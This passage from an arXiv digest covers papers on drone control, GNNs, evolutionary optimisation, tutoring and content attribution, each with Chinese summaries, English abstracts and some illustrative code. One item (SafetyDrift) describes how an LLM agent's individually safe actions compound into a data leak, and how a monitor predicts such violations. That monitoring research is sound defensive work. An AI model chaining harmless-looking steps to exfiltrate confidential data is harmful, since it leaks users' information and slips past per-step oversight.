accuracy compared to mainstream MARL approaches, maintaining robust performance even under intense environmental interference and fluid topological shifts.
[AI-116] An End-to-end Flight Control Network for High-speed UAV Obstacle Avoidance based on Event-Depth Fusion
【速读】:该论文旨在解决复杂环境中高速自主飞行的障碍物避让难题,尤其针对静态、动态或混合障碍物场景下单一感知模态信息不完整的问题。现有深度相机在高速运动时易受运动模糊影响,而事件相机虽擅长捕捉快速运动却难以感知静态场景,导致传统方法在动态与静态环境协同感知中表现受限。解决方案的关键在于提出一种端到端的飞行控制网络,通过双向交叉注意力(bidirectional cross-attention)模块实现深度图像与事件数据的特征级融合,从而有效整合两种传感器的互补优势;同时设计基于球面主搜索(Spherical Principal Search, SPS)的高效专家规划器,在保持轨迹平滑性的同时将计算复杂度从O(n²)降低至O(n),显著提升高鲁棒性避障性能,在17 m/s速度下成功率达80%以上,优于单模态及单向融合模型10–20%。
链接: https://arxiv.org/abs/2603.27181
作者: Dikai Shang,Jingyue Zhao,Shi Xu,Nanyang Ye,Lei Wang
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注: 7 pages, 10 figures
Abstract:Achieving safe, high-speed autonomous flight in complex environments with static, dynamic, or mixed obstacles remains challenging, as a single perception modality is incomplete. Depth cameras are effective for static objects but suffer from motion blur at high speeds. Conversely, event cameras excel at capturing rapid motion but struggle to perceive static scenes. To exploit the complementary strengths of both sensors, we propose an end-to-end flight control network that achieves feature-level fusion of depth images and event data through a bidirectional cross-attention module. The end-to-end network is trained via imitation learning, which relies on high-quality supervision. Building on this insight, we design an efficient expert planner using Spherical Principal Search (SPS). This planner reduces computational complexity from O(n^2) to O(n) while generating smoother trajectories, achieving over 80% success rate at 17 m/s, nearly 20% higher than traditional planners. Simulation experiments show that our method attains a 70-80% success rate at 17 m/s across varied scenes, surpassing single-modality and unidirectional fusion models by 10-20%. These results demonstrate that bidirectional fusion effectively integrates event and depth information, enabling more reliable obstacle avoidance in complex environments with both static and dynamic objects.
[AI-117] Aligning LLM s with Graph Neural Solvers for Combinatorial Optimization
【速读】:该论文旨在解决纯语言模型在求解组合优化问题(Combinatorial Optimization Problems, COPs)时难以准确捕捉复杂关系结构的问题,尤其是在中等规模及以上实例上表现不佳。其解决方案的关键在于提出AlignOPT方法,通过将大语言模型(Large Language Models, LLMs)与图神经网络求解器(Graph Neural Solvers)对齐,实现语义理解与结构建模的协同融合:LLMs负责编码COP任务及实例的自然语言描述,图神经网络则显式建模实例的底层图结构,从而构建更具泛化能力的神经启发式算法。实验表明,该方法在多种COP任务上达到最优性能,并展现出良好的未见实例扩展能力。
链接: https://arxiv.org/abs/2603.27169
作者: Shaodi Feng,Zhuoyi Lin,Yaoxin Wu,Haiyan Yin,Yan Jin,Senthilnath Jayavelu,Xun Xu
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 18 pages, 3 figures
Abstract:Recent research has demonstrated the effectiveness of large language models (LLMs) in solving combinatorial optimization problems (COPs) by representing tasks and instances in natural language. However, purely language-based approaches struggle to accurately capture complex relational structures inherent in many COPs, rendering them less effective at addressing medium-sized or larger instances. To address these limitations, we propose AlignOPT, a novel approach that aligns LLMs with graph neural solvers to learn a more generalizable neural COP heuristic. Specifically, AlignOPT leverages the semantic understanding capabilities of LLMs to encode textual descriptions of COPs and their instances, while concurrently exploiting graph neural solvers to explicitly model the underlying graph structures of COP instances. Our approach facilitates a robust integration and alignment between linguistic semantics and structural representations, enabling more accurate and scalable COP solutions. Experimental results demonstrate that AlignOPT achieves state-of-the-art results across diverse COPs, underscoring its effectiveness in aligning semantic and structural representations. In particular, AlignOPT demonstrates strong generalization, effectively extending to previously unseen COP instances.
[AI-118] GSR-GNN: Training Acceleration and Memory-Saving Framework of Deep GNNs on Circuit Graph
【速读】:该论文旨在解决图神经网络(Graph Neural Networks, GNNs)在现代大规模电路图分析中因GPU内存限制和训练成本过高而难以扩展的问题,尤其是在深度模型场景下。其解决方案的关键在于提出一种名为分组稀疏可逆图神经网络(Grouped-Sparse-Reversible GNN, GSR-GNN)的新架构:通过引入可逆残差模块与分组稀疏非线性算子,在压缩节点嵌入的同时保留任务相关特征,并结合优化的执行流水线消除碎片化激活存储、减少数据移动,从而实现高达87.2%的峰值内存降低和30倍以上的训练速度提升,同时保持相关性指标几乎无损,使深层GNN在大规模电子设计自动化(EDA)任务中具备实际可行性。
链接: https://arxiv.org/abs/2603.27156
作者: Yuebo Luo,Shiyang Li,Yifei Feng,Vishal Kancharla,Shaoyi Huang,Caiwen Ding
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: 8 pages including references, already been accepted to DAC 2026
Abstract:Graph Neural Networks (GNNs) show strong promise for circuit analysis, but scaling to modern large-scale circuit graphs is limited by GPU memory and training cost, especially for deep models. We revisit deep GNNs for circuit graphs and show that, when trainable, they significantly outperform shallow architectures, motivating an efficient, domain-specific training framework. We propose Grouped-Sparse-Reversible GNN (GSR-GNN), which enables training GNNs with up to hundreds of layers while reducing both compute and memory overhead. GSR-GNN integrates reversible residual modules with a group-wise sparse nonlinear operator that compresses node embeddings without sacrificing task-relevant information, and employs an optimized execution pipeline to eliminate fragmented activation storage and reduce data movement. On sampled circuit graphs, GSR-GNN achieves up to 87.2% peak memory reduction and over 30 \times training speedup with negligible degradation in correlation-based quality metrics, making deep GNNs practical for large-scale EDA workloads.
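GSR-GNN 所依赖的可逆残差模块之所以能大幅降低峰值内存,是因为每层输出可被精确反演回输入,反向传播时无需存储中间激活。其标量形式可示意如下(F、G 取任意简单映射,仅为说明可逆结构本身):

```python
def rev_forward(x1, x2, f, g):
    """可逆残差块前向:输入按通道拆成两半 (x1, x2)。"""
    y1 = x1 + f(x2)
    y2 = x2 + g(y1)
    return y1, y2

def rev_inverse(y1, y2, f, g):
    """由输出精确重算输入:训练时按需重建激活,而不必缓存它们。"""
    x2 = y2 - g(y1)
    x1 = y1 - f(x2)
    return x1, x2
```

以计算换内存:反向时每层多做一次 F、G 的前向重算,换来激活存储量与层数近似无关,这正是"数百层GNN可训练"的前提之一。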
[AI-119] A Tight Expressivity Hierarchy for GNN-Based Entity Resolution in Master Data Management
【速读】:该论文旨在解决实体解析(Entity Resolution)中如何根据匹配准则选择最简且理论有效的消息传递神经网络(MPNN)架构的问题。其核心挑战在于不同实体解析任务具有本质不同的复杂度,而现有通用MPNN结构(如包含反向消息传递、端口编号和自体ID等扩展)往往引入不必要的计算开销。解决方案的关键在于提出一套基于类型化实体-属性图的四定理分离理论:通过定义共指谓词 Dup_r(两个同类型实体至少共享 r 个属性值)和 ℓ-环谓词 Cyc_ℓ(存在实体间边的场景),证明了每类谓词所需的最小MPNN深度与结构特征——检测单个共享属性仅需两层反向消息传递即可完成(纯局部性),而检测多个共享属性则必须引入跨属性身份关联(非局部性),这要求使用自体ID并至少四层才能实现,即使在无环二分图上亦然;类似结论也适用于环检测。由此确立了"最小架构原则",即实践者可依据任务需求选取成本最低但理论上完备的MPNN适应集,且保证不存在更简单的替代方案。
链接: https://arxiv.org/abs/2603.27154
作者: Ashwin Ganesan
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Data Structures and Algorithms (cs.DS)
备注:
Abstract:Entity resolution – identifying database records that refer to the same real-world entity – is naturally modelled on bipartite graphs connecting entity nodes to their attribute values. Applying a message-passing neural network (MPNN) with all available extensions (reverse message passing, port numbering, ego IDs) incurs unnecessary overhead, since different entity resolution tasks have fundamentally different complexity. For a given matching criterion, what is the cheapest MPNN architecture that provably works? We answer this with a four-theorem separation theory on typed entity-attribute graphs. We introduce co-reference predicates \mathrmDup_r (two same-type entities share at least r attribute values) and the \ell -cycle predicate \mathrmCyc_\ell for settings with entity-entity edges. For each predicate we prove tight bounds – constructing graph pairs provably indistinguishable by every MPNN lacking the required adaptation, and exhibiting explicit minimal-depth MPNNs that compute the predicate on all inputs. The central finding is a sharp complexity gap between detecting any shared attribute and detecting multiple shared attributes. The former is purely local, requiring only reverse message passing in two layers. The latter demands cross-attribute identity correlation – verifying that the same entity appears at several attributes of the target – a fundamentally non-local requirement needing ego IDs and four layers, even on acyclic bipartite graphs. A similar necessity holds for cycle detection. Together, these results yield a minimal-architecture principle: practitioners can select the cheapest sufficient adaptation set, with a guarantee that no simpler architecture works. Computational validation confirms every prediction. 
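论文中共指谓词 Dup_r 的"参考语义"可以在二分实体-属性图上用集合交直接表达。注意这只是谓词本身的定义(一个集中式的判定器),并非 MPNN 实现;论文的结论正是:当 r ≥ 2 时,MPNN 必须借助 ego ID 且至少四层才能计算它:

```python
def dup_r(graph, e1, e2, r):
    """当且仅当实体 e1 与 e2 共享至少 r 个属性值节点时为真。
    graph: 实体 -> 其属性值集合(二分实体-属性图的邻接表示)。"""
    return len(graph[e1] & graph[e2]) >= r
```

r=1(任意一个共享属性)只需局部信息即可判定,而 r≥2 需要核对"同一个实体"出现在多个属性处,这正是摘要所说的跨属性身份关联。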
[AI-120] SafetyDrift: Predicting When AI Agents Cross the Line Before They Actually Do
【速读】:该论文旨在解决生成式 AI(Generative AI)代理在执行看似安全的单步操作时,因行为序列累积导致的数据泄露问题,即“安全漂移”(safety drift)。其核心挑战在于:虽然每一步单独来看均不违反安全规则,但多步骤组合可能引发不可逆的安全违规。解决方案的关键在于将代理的安全轨迹建模为吸收马尔可夫链(absorbing Markov chains),通过闭式吸收分析计算在有限步数内达到违规状态的概率,从而实现对“不可逆点”(points of no return)的精准预测。该方法揭示了任务类型对安全风险演化路径的显著影响,并基于此构建轻量级监控器,在极低计算开销下实现了高精度、提前预警的违规检测,显著优于传统关键词匹配和逐步大语言模型(LLM)判断方法。
链接: https://arxiv.org/abs/2603.27148
作者: Aditya Dhodapkar,Farhaan Pishori
机构: 未知
类目: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI)
备注: 9 pages, 7 figures, sent to COLM conference
Abstract:When an LLM agent reads a confidential file, then writes a summary, then emails it externally, no single step is unsafe, but the sequence is a data leak. We call this safety drift: individually safe actions compounding into violations. Prior work has measured this problem; we predict it. SafetyDrift models agent safety trajectories as absorbing Markov chains, computing the probability that a trajectory will reach a violation within a given number of steps via closed form absorption analysis. A consequence of the monotonic state design is that every agent will eventually violate safety if left unsupervised (absorption probability 1.0 from all states), making the practical question not if but when, and motivating our focus on finite horizon prediction. Across 357 traces spanning 40 realistic tasks in four categories, we discover that “points of no return” are sharply task dependent: in communication tasks, agents that reach even a mild risk state have an 85% chance of violating safety within five steps, while in technical tasks the probability stays below 5% from any state. A lightweight monitor built on these models detects 94.7% of violations with 3.7 steps of advance warning at negligible computational cost, outperforming both keyword matching (44.7% detection, 55.9% false positive rate) and per step LLM judges (52.6% detection, 38.2% false positive rate) while running over 60,000x faster.
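把代理安全轨迹建模为吸收马尔可夫链后,"k 步内发生违规"的概率可以通过逐步传播状态分布得到。下例用一个虚构的二状态链(状态0安全、状态1为吸收的违规状态)示意;与摘要一致,只要安全状态有正的流出概率,吸收概率就随步数趋于 1:

```python
def absorb_within(P, start, absorbing, k):
    """从 start 状态出发,k 步内到达吸收状态 absorbing 的概率。
    P 为行随机转移矩阵;吸收状态满足 P[absorbing][absorbing] = 1。"""
    n = len(P)
    dist = [0.0] * n
    dist[start] = 1.0
    for _ in range(k):
        nxt = [0.0] * n
        for i in range(n):
            for j in range(n):
                nxt[j] += dist[i] * P[i][j]
        dist = nxt
    return dist[absorbing]
```

论文报告的"不可逆点"即对应:某些任务类型下,一旦进入风险状态,这个有限步吸收概率会陡增(如通信任务五步内达 85%)。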
[AI-121] Bayesian-Symbolic Integration for Uncertainty-Aware Parking Prediction ITSC2025
【速读】:该论文旨在解决智能交通系统中停车可用性预测面临的现实挑战,包括数据稀疏性、噪声干扰及不可预测的环境变化,这些问题导致传统模型在实际部署中鲁棒性不足。解决方案的关键在于提出一种松耦合的神经符号框架,将贝叶斯神经网络(Bayesian Neural Networks, BNNs)与符号推理相结合:BNNs用于量化预测不确定性,而通过决策树提取的符号知识以概率逻辑编程形式编码,并采用两种混合策略——一是当BNN置信度低时启用符号推理作为备选方案,二是基于符号约束对输出类别进行上下文精炼后再重新应用BNN。实验表明,该方法在全量、稀疏和噪声条件下均优于纯符号推理及LSTM和BNN基线模型,凸显了模块化神经符号集成在不确定性环境中的潜力。
链接: https://arxiv.org/abs/2603.27119
作者: Alireza Nezhadettehad,Arkady Zaslavsky,Abdur Rakib,Seng W. Loke
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: Accepted at IEEE ITSC 2025 (to appear)
Abstract:Accurate parking availability prediction is critical for intelligent transportation systems, but real-world deployments often face data sparsity, noise, and unpredictable changes. Addressing these challenges requires models that are not only accurate but also uncertainty-aware. In this work, we propose a loosely coupled neuro-symbolic framework that integrates Bayesian Neural Networks (BNNs) with symbolic reasoning to enhance robustness in uncertain environments. BNNs quantify predictive uncertainty, while symbolic knowledge extracted via decision trees and encoded using probabilistic logic programming is leveraged in two hybrid strategies: (1) using symbolic reasoning as a fallback when BNN confidence is low, and (2) refining output classes based on symbolic constraints before reapplying the BNN. We evaluate both strategies on real-world parking data under full, sparse, and noisy conditions. Results demonstrate that both hybrid methods outperform symbolic reasoning alone, and the context-refinement strategy consistently exceeds the performance of Long Short-Term Memory (LSTM) networks and BNN baselines across all prediction windows. Our findings highlight the potential of modular neuro-symbolic integration in real-world, uncertainty-prone prediction tasks.
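摘要中的策略一("BNN 置信度低时回退到符号推理")控制流非常直接,可示意如下。置信度阈值 0.8 与示例符号规则均为假设:

```python
def predict_with_fallback(bnn_label, bnn_confidence, symbolic_rule, features,
                          threshold=0.8):
    """混合策略一:BNN 足够自信时采用其预测,否则回退到符号规则。
    返回 (预测结果, 实际使用的推理路径)。"""
    if bnn_confidence >= threshold:
        return bnn_label, "bnn"
    return symbolic_rule(features), "symbolic"
```

策略二(先用符号约束收窄候选类别、再重跑 BNN)结构类似,只是符号层从"兜底"变为"前置过滤",这也是论文中表现更稳的那条路线。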
[AI-122] Gender-Based Heterogeneity in Youth Privacy-Protective Behavior for Smart Voice Assistants: Evidence from Multigroup PLS-SEM CEC
【速读】:该论文旨在解决性别如何影响青少年在智能语音助手(Smart Voice Assistant, SVA)生态系统中的隐私决策问题。其核心贡献在于通过多群组偏最小二乘结构方程模型(Multigroup Partial Least Squares Structural Equation Modeling)对469名加拿大16-24岁青年的数据进行分析,揭示了性别在五个隐私构念(感知隐私风险、感知隐私收益、算法透明度与信任、隐私自我效能感、隐私保护行为)之间路径上的异质性:男性更受感知隐私风险直接影响隐私保护行为,而女性则更多通过算法透明度与信任提升隐私自我效能感进而促进隐私保护行为。这一发现表明,性别可能调节关键隐私决策路径,为设计更具响应性的透明度和控制干预措施提供了实证依据。
链接: https://arxiv.org/abs/2603.27117
作者: Molly Campbell,Yulia Bobkova,Ajay Kumar Shrestha
机构: 未知
类目: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI); Computers and Society (cs.CY)
备注: To appear in IEEE CCECE 2026 proceedings
Abstract:This paper investigates how gender shapes privacy decision-making in youth smart voice assistant (SVA) ecosystems. Using survey data from 469 Canadian youths aged 16-24, we apply multigroup Partial Least Squares Structural Equation Modeling to compare males (N=241) and females (N=174) (total N = 415) across five privacy constructs: Perceived Privacy Risks (PPR), Perceived Privacy Benefits (PPBf), Algorithmic Transparency and Trust (ATT), Privacy Self-Efficacy (PSE), and Privacy Protective Behavior (PPB). Results provide exploratory evidence of gender heterogeneity in selected pathways. The direct effect of PPR on PPB is stronger for males (Male: \beta = 0.424; Female: \beta = 0.233; p 0.1), while the indirect effect of ATT on PPB via PSE is stronger for females (Female: \beta = 0.229; Male: \beta = 0.132; p 0.1). Descriptive analysis of non-binary (N=15) and prefer-not-to-say participants (N=39) shows lower trust and higher perceived risk than the binary groups, motivating future work with adequately powered gender-diverse samples. Overall, the findings provide exploratory evidence that gender may moderate key privacy pathways, supporting more responsive transparency and control interventions for youth SVA use.
[AI-123] Sovereign Context Protocol: An Open Attribution Layer for Human-Generated Content in the Age of Large Language Models
【速读】:该论文旨在解决大型语言模型(Large Language Models, LLMs)在训练和推理过程中大量使用人类生成内容(Human-Generated Content, HGC)时,内容创作者无法被有效识别与溯源的问题。现有方法要么依赖模型内部的梯度信号进行影响追踪(model-internals level),要么通过法律政策手段如透明度要求或版权诉讼实现数据归属(legal-policy level),均缺乏在运行时(runtime)对内容消费行为的实时记录与归因机制。解决方案的关键在于提出主权上下文协议(Sovereign Context Protocol, SCP),这是一个开源协议规范与参考架构,作为LLM与创作者拥有数据之间的可归因数据访问层,确保每次数据访问事件均可被日志记录、授权许可并明确归属。SCP通过定义六项核心功能(包括创作者身份认证、语义搜索、内容检索、可信度/价值评分、真实性验证及访问审计)并支持REST与Anthropic Model Context Protocol (MCP)兼容接口,使归因成为数据访问的默认属性,从而填补当前LLM生态中内容创作价值分配的“归因缺口”(attribution gap)。
链接: https://arxiv.org/abs/2603.27094
作者: Praneel Panchigar,Torlach Rush,Matthew Canabarro
机构: 未知
类目: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 7 pages
Abstract:Large Language Models (LLMs) consume vast quantities of human-generated content for both training and real-time inference, yet the creators of that content remain largely invisible in the value chain. Existing approaches to data attribution operate either at the model-internals level, tracing influence through gradient signals, or at the legal-policy level through transparency mandates and copyright litigation. Neither provides a runtime mechanism for content creators to know when, by whom, and how their work is being consumed. We introduce the Sovereign Context Protocol (SCP), an open-source protocol specification and reference architecture that functions as an attribution-aware data access layer between LLMs and human-generated content. Inspired by Anthropic’s Model Context Protocol (MCP), which standardizes how LLMs connect to tools, SCP standardizes how LLMs connect to creator-owned data, with every access event logged, licensed, and attributable. SCP defines six core methods (creator profiles, semantic search, content retrieval, trust/value scoring, authenticity verification, and access auditing) exposed over both REST and MCP-compatible interfaces. We formalize the protocol’s message envelope, present a threat model with five adversary classes, propose a log-proportional revenue attribution model, and report preliminary latency benchmarks from a reference implementation built on FastAPI, ChromaDB, and NetworkX. We situate SCP within the emerging regulatory landscape, including the EU AI Act’s Article 53 training data transparency requirements and ongoing U.S. copyright litigation, and argue that the attribution gap requires a protocol-level intervention that makes attribution a default property of data access.
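摘要提出的"对数比例收益归因模型"可以示意为按 log(1 + 访问次数) 加权分配收益池。具体权重函数以论文为准,此处采用常见的 log1p 形式,访问计数与池金额均为虚构:

```python
import math

def attribute_revenue(access_counts, pool):
    """按 log(1 + 访问次数) 的比例在创作者之间分配收益池。
    对数加权会压低超高访问量的优势,使长尾创作者也能获得份额。"""
    weights = {c: math.log1p(n) for c, n in access_counts.items()}
    total = sum(weights.values())
    return {c: pool * w / total for c, w in weights.items()}
```

例如访问量相差 10 倍的两位创作者,线性归因下份额比约为 1:10,而对数归因下仅约 1:2,体现了"归因默认化但不赢者通吃"的设计取向。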
[AI-124] RDEx-MOP: Indicator-Guided Reconstructed Differential Evolution for Fixed-Budget Multiobjective Optimization
【速读】:该论文旨在解决约束边界多目标优化(bound-constrained multiobjective optimisation)中如何在有限评估预算下快速收敛至目标区域的问题,而不仅依赖最终的IGD(Inverted Generational Distance)指标。其解决方案的关键在于提出RDEx-MOP算法,该算法融合了基于指标的环境选择(indicator-based environmental selection)、保持种群多样性的Pareto候选集(niche-maintained Pareto-candidate set),以及互补的差分进化算子(complementary differential evolution operators)以平衡探索与开发能力,从而在CEC 2025 MOP基准测试中实现了最优的总得分和平均排名。
链接: https://arxiv.org/abs/2603.27092
作者: Sichen Tao,Yifei Yang,Ruihan Zhao,Kaiyu Wang,Sicheng Liu,Shangce Gao
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI)
备注:
Abstract:Multiobjective optimisation in the CEC 2025 MOP track is evaluated not only by final IGD values but also by how quickly an algorithm reaches the target region under a fixed evaluation budget. This report documents RDEx-MOP, the reconstructed differential evolution variant used in the IEEE CEC 2025 numerical optimisation competition (C06 special session) bound-constrained multiobjective track. RDEx-MOP integrates indicator-based environmental selection, a niche-maintained Pareto-candidate set, and complementary differential evolution operators for exploration and exploitation. We evaluate RDEx-MOP on the official CEC 2025 MOP benchmark using the released checkpoint traces and the median-target U-score framework. Experimental results show that RDEx-MOP achieves the highest total score and the best average rank among all released comparison algorithms, including the earlier RDEx baseline.
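The IGD metric referenced above measures how well an approximation set covers a reference Pareto front; a minimal sketch of the standard definition:

```python
import math

def igd(reference, approximation):
    """Inverted Generational Distance: average distance from each
    reference-front point to its nearest approximation point
    (lower is better; 0 means the front is covered exactly)."""
    return sum(min(math.dist(r, a) for a in approximation)
               for r in reference) / len(reference)

ref = [(0.0, 1.0), (0.5, 0.5), (1.0, 0.0)]
perfect = igd(ref, ref)                       # exact coverage -> 0.0
shifted = igd(ref, [(0.1, 1.1), (1.1, 0.1)])  # shifted set -> positive
```

Under a fixed-budget protocol like the CEC 2025 track, this quantity is tracked at evaluation checkpoints rather than only at the end, which is why convergence speed matters as much as the final value.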
[AI-125] RDEx-CSOP: Feasibility-Aware Reconstructed Differential Evolution with Adaptive epsilon-Constraint Ranking
【速读】:该论文旨在解决约束单目标数值优化(Constrained Single-Objective Numerical Optimization)问题,核心挑战在于有限评估预算下同时保证可行解的维持与目标值的强收敛性。解决方案的关键在于提出RDEx-CSOP算法,其创新性融合了三方面机制:基于成功历史的参数自适应(Success-History Parameter Adaptation)、偏向开发的混合搜索策略(Exploitation-Biased Hybrid Search),以及具有时变阈值的ε约束处理机制(ε-Constraint Handling with Time-Varying Threshold)。这种组合使算法在CEC 2025标准测试集上展现出卓越的速度性能和稳健的约束处理能力,最终在U-score框架下的总分和平均排名均优于所有对比算法。
链接: https://arxiv.org/abs/2603.27090
作者: Sichen Tao,Yifei Yang,Ruihan Zhao,Kaiyu Wang,Sicheng Liu,Shangce Gao
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI)
备注:
Abstract:Constrained single-objective numerical optimisation requires both feasibility maintenance and strong objective-value convergence under limited evaluation budgets. This report documents RDEx-CSOP, a constrained differential evolution variant used in the IEEE CEC 2025 numerical optimisation competition (C06 special session). RDEx-CSOP combines success-history parameter adaptation with an exploitation-biased hybrid search and an \epsilon-constraint handling mechanism with a time-varying threshold. We evaluate RDEx-CSOP on the official CEC 2025 CSOP benchmark using the U-score framework (Speed, Accuracy, and Constraint categories). The results show that RDEx-CSOP achieves the highest total score and the best average rank among all released comparison algorithms, mainly through strong speed and competitive constraint-handling performance across the 28 benchmark functions.
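An ε-constraint comparison with a time-varying threshold, of the kind RDEx-CSOP uses, can be sketched roughly as follows. The decay schedule and all parameter values are illustrative assumptions, not the paper's exact settings:

```python
def epsilon_level(t, t_max, eps0, cp=5.0):
    """Time-varying feasibility threshold: starts at eps0 and decays
    to 0, so late generations enforce strict feasibility."""
    return eps0 * max(0.0, 1.0 - t / t_max) ** cp

def better(a, b, eps):
    """epsilon-constraint comparison of (objective, violation) pairs:
    if both violations are within eps, compare objectives; otherwise
    the smaller constraint violation wins."""
    (fa, va), (fb, vb) = a, b
    if (va <= eps and vb <= eps) or va == vb:
        return fa < fb
    return va < vb

# Early on, a slightly infeasible but better-objective solution can win;
# once eps has decayed to 0, feasibility dominates.
early = better((1.0, 0.05), (2.0, 0.0), epsilon_level(10, 100, 0.1))
late = better((1.0, 0.05), (2.0, 0.0), epsilon_level(100, 100, 0.1))
```

This relaxation is what lets the search exploit good objective values near the feasible boundary early while still converging to feasible solutions.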
[AI-126] RDEx-SOP: Exploitation-Biased Reconstructed Differential Evolution for Fixed-Budget Bound-Constrained Single-Objective Optimization
【速读】:该论文旨在解决边界约束的单目标数值优化问题中,如何在严格评估预算下平衡进化算法的快速收敛性与最终解质量的问题。解决方案的关键在于提出RDEx-SOP算法,其核心创新包括:基于历史成功信息的参数自适应机制、偏向开发(exploitation)的混合分支策略,以及轻量级局部扰动技术,从而有效协调收敛速度与解精度,在IEEE CEC 2025数值优化竞赛的官方基准测试中展现出优异的整体性能和统计上具有竞争力的最终结果。
链接: https://arxiv.org/abs/2603.27089
作者: Sichen Tao,Yifei Yang,Ruihan Zhao,Kaiyu Wang,Sicheng Liu,Shangce Gao
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI)
备注:
Abstract:Bound-constrained single-objective numerical optimisation remains a key benchmark for assessing the robustness and efficiency of evolutionary algorithms. This report documents RDEx-SOP, an exploitation-biased success-history differential evolution variant used in the IEEE CEC 2025 numerical optimisation competition (C06 special session). RDEx-SOP combines success-history parameter adaptation, an exploitation-biased hybrid branch, and lightweight local perturbations to balance fast convergence and final solution quality under a strict evaluation budget. We evaluate RDEx-SOP on the official CEC 2025 SOP benchmark with the U-score framework (Speed and Accuracy categories). Experimental results show that RDEx-SOP achieves strong overall performance and statistically competitive final outcomes across the 29 benchmark functions.
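Success-history parameter adaptation, in the SHADE family that RDEx variants build on, keeps a circular memory of scale-factor means updated from the F values that produced improvements. A minimal sketch (memory size and weighting are illustrative):

```python
def lehmer_mean(values, weights):
    """Weighted Lehmer mean, the usual aggregator for successful F values."""
    num = sum(w * v * v for v, w in zip(values, weights))
    den = sum(w * v for v, w in zip(values, weights))
    return num / den

class SuccessHistory:
    """Circular memory of scale-factor means (a SHADE-style sketch)."""
    def __init__(self, size=5, init_f=0.5):
        self.memory = [init_f] * size
        self.pos = 0

    def update(self, successful_f, improvements):
        """After a generation, fold successful F values into the memory,
        weighting each by the fitness improvement it produced."""
        if not successful_f:
            return  # no successes this generation: keep memory unchanged
        total = sum(improvements)
        weights = [d / total for d in improvements]
        self.memory[self.pos] = lehmer_mean(successful_f, weights)
        self.pos = (self.pos + 1) % len(self.memory)

history = SuccessHistory(size=2)
history.update([0.4, 0.8], [1.0, 1.0])  # equal-weight Lehmer mean = 2/3
```

New trial vectors then sample F around a randomly chosen memory slot, biasing the search toward settings that recently worked.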
[AI-127] When Verification Hurts: Asymmetric Effects of Multi-Agent Feedback in Logic Proof Tutoring
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在结构化符号领域(如命题逻辑证明)中提供步骤级反馈的可靠性问题,尤其关注其是否能根据学习者的当前证明状态生成精确、有效的指导。解决方案的关键在于构建一个基于知识图谱的基准测试集(knowledge-graph-grounded benchmark),包含516个独特的证明状态及其细粒度标注与难度指标,并设计三种角色专业化管道:Tutor(部分解题访问)、Teacher(完整推导访问)和Judge(验证Tutor反馈)。通过对比不同管道在反馈质量上的表现,研究发现验证机制的效果具有显著依赖性——当上游反馈不可靠时,验证可提升准确率至70%;但当反馈已可靠时,过度规范反而使性能下降4–6个百分点,揭示了复杂度上限(复杂度4–5以上时无模型能稳定成功),从而挑战了“增加验证或更丰富上下文必然改善教学”的假设,推动开发基于难度感知和上游可靠性动态路由的自适应架构。
链接: https://arxiv.org/abs/2603.27076
作者: Tahreem Yasir,Sutapa Dey Tithi,Benyamin Tabarsi,Dmitri Droujkov,Sam Gilson,Yasitha Rajapaksha,Xiaoyi Tian,Arun Ramesh,DongKuan (DK) Xu,Tiffany Barnes
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 21 pages, 1 figure
Abstract:Large language models (LLMs) are increasingly used for automated tutoring, but their reliability in structured symbolic domains remains unclear. We study step-level feedback for propositional logic proofs, which require precise symbolic reasoning aligned with a learner’s current proof state. We introduce a knowledge-graph-grounded benchmark of 516 unique proof states with step-level annotations and difficulty metrics. Unlike prior tutoring evaluations that rely on model self-assessment or binary correctness, our framework enables fine-grained analysis of feedback quality against verified solution paths. We evaluate three role-specialized pipelines with varying solution access: Tutor (partial solution access), Teacher (full derivation access), and Judge (verification of Tutor feedback). Our results reveal a striking asymmetry: verification improves outcomes when upstream feedback is error-prone (70% accuracy), but degrades performance by 4-6 percentage points through over-specification when feedback is already reliable (85%). Critically, we identify a shared complexity ceiling; no model or pipeline reliably succeeds on proof states exceeding complexity 4-5. These findings challenge the assumption that adding verifiers or richer context universally improves tutoring, motivating adaptive, difficulty-aware architectures that route problems by estimated complexity and upstream reliability.
[AI-128] Dynamic resource matching in manufacturing using deep reinforcement learning
【速读】:该论文旨在解决制造资源动态匹配问题,即在多期、多对多的场景下,如何高效地将不同类型的需求(demand)与生产能力(capacity)进行逻辑分配,以实现资源利用效率的最大化。该问题具有状态空间和动作空间庞大、需求联合分布难以精确建模等挑战,传统方法面临维数灾难和策略收敛缓慢的问题。解决方案的关键在于引入一种基于领域知识的改进型深度强化学习框架:首先,在Q-learning中引入两类惩罚机制——基于先验策略的领域知识惩罚和满足供需约束的不可行动作惩罚,以提升初始估计准确性并加速收敛;其次,将该改进方法嵌入深度确定性策略梯度(Deep Deterministic Policy Gradient, DDPG)算法,形成领域知识引导的DDPG(Domain Knowledge-informed DDPG, DKDDPG),从而在小规模问题中提供理论收敛保证,并在大规模实验中显著优于传统RL算法,表现出更高的奖励值和更优的时间与训练效率。
链接: https://arxiv.org/abs/2603.27066
作者: Saunak Kumar Panda,Yisha Xiang,Ruiqi Liu
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Optimization and Control (math.OC)
备注: 29 pages, 6 figures, 3 tables; Published in European Journal of Operational Research, Vol. 318(2), 2024
Abstract:Matching plays an important role in the logical allocation of resources across a wide range of industries. The benefits of matching have been increasingly recognized in manufacturing industries. In particular, capacity sharing has received much attention recently. In this paper, we consider the problem of dynamically matching demand-capacity types of manufacturing resources. We formulate the multi-period, many-to-many manufacturing resource-matching problem as a sequential decision process. The formulated manufacturing resource-matching problem involves large state and action spaces, and it is not practical to accurately model the joint distribution of various types of demands. To address the curse of dimensionality and the difficulty of explicitly modeling the transition dynamics, we use a model-free deep reinforcement learning approach to find optimal matching policies. Moreover, to tackle the issue of infeasible actions and slow convergence due to initial biased estimates caused by the maximum operator in Q-learning, we introduce two 